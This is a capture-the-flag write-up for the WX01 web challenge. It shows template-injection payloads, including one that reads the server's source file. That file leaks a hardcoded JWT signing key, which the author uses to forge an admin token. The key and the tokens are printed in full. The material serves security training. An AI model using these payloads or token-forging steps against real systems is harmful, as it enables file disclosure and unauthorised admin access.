WX01 - 1000pts

Briefing

Access the url at: https://cfta-wx01.allyourbases.co and find a way to login to the admin portal to get the flag. Note: You have been provided with the following credentials to help you: username: tim password: berners-lee

Solution

  1. 1.
    There is a login form and a form to enter an email address to get help logging in. Attempting to login with the provided credentials, tim:berners-lee, and monitoring requests using Burp Suite shows that a POST request with the JSON action key set to verify and a token key that corresponds to a JSON Web Token.
  2. 2.
    I attempted to brute force decrypt this JWT, but it did not succeed.
  3. 3.
    I moved on to the help form. It has to serve a purpose and thus must be vulnerable to some form of input. I tried a SSTI (Server Side Template Injection) similar to the Italian dish suggestion site from WM04. Crashing the help form using the SSTI string {{foo()}} prints this as part of a stacktrace:
    1
    File "/var/task/lambda_function.py", line 18, in getHelp
    2
    msg = Template(template).render(dir=dir, help=help, locals=locals, globals=globals, open=open)
    Copied!
    We have access to locals() and globals(). Also, open() lets us read an arbitrary file.
  4. 4.
    Use {{open('lambda_function.py').read()}} to dump the contents of lambda_function.py:
    1
    import json
    2
    import urllib
    3
    import jwt
    4
    import os
    5
    6
    # JWT Key
    7
    key = "aversion-chute-freeway-corporal"
    8
    algo = "HS256"
    9
    10
    def getHelp(event):
    11
    email = ''.join(event['email'])
    12
    template = """
    13
    <p>Your request has been submitted.</p>
    14
    <p>You will receive an email at: %s</p>
    15
    <p>This might take a reaaaaaaally long time though (forever).</p>
    16
    """ % (urllib.parse.unquote(email).replace("<", "&lt;").replace(">", "&gt;"))
    17
    msg = Template(template).render(dir=dir, help=help, locals=locals, globals=globals, open=open)
    18
    msg = msg[:-len(msg)+700]
    19
    return msg
    Copied!
    The JWT key is aversion-chute-freeway-corporal.
  5. 5.
    Login with credentials tim:berners-lee to get a JWT: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InRpbSIsInJvbGUiOiJ1c2VyIn0.j8wX114OSLEo2I4S6GQ4wQ4ZszXtyp0wFc0lpwc1yRQ.
  6. 6.
    Use jsonwebtoken.io to change the role value from user to admin with the leaked secret key to get a new JWT: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InRpbSIsInJvbGUiOiJhZG1pbiIsImp0aSI6IjUxZjE3OTJiLWMwYjItNGQ3NS04YjY5LTE0ZDM5ZjJkMGM2NiIsImlhdCI6MTYxNzcyNDk1MiwiZXhwIjoxNjE3NzI4NTUyfQ.QoopGSdFjhSe0gxHwEng-n6e9Z5FTP3_-iemndGcJVU
  7. 7.
    Send a request with this JSON {"action":"verify","token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InRpbSIsInJvbGUiOiJhZG1pbiIsImp0aSI6IjUxZjE3OTJiLWMwYjItNGQ3NS04YjY5LTE0ZDM5ZjJkMGM2NiIsImlhdCI6MTYxNzcyNDk1MiwiZXhwIjoxNjE3NzI4NTUyfQ.QoopGSdFjhSe0gxHwEng-n6e9Z5FTP3_-iemndGcJVU"} to get the flag.

Flag

muLtiStagingIT710-12
Last modified 1yr ago
Copy link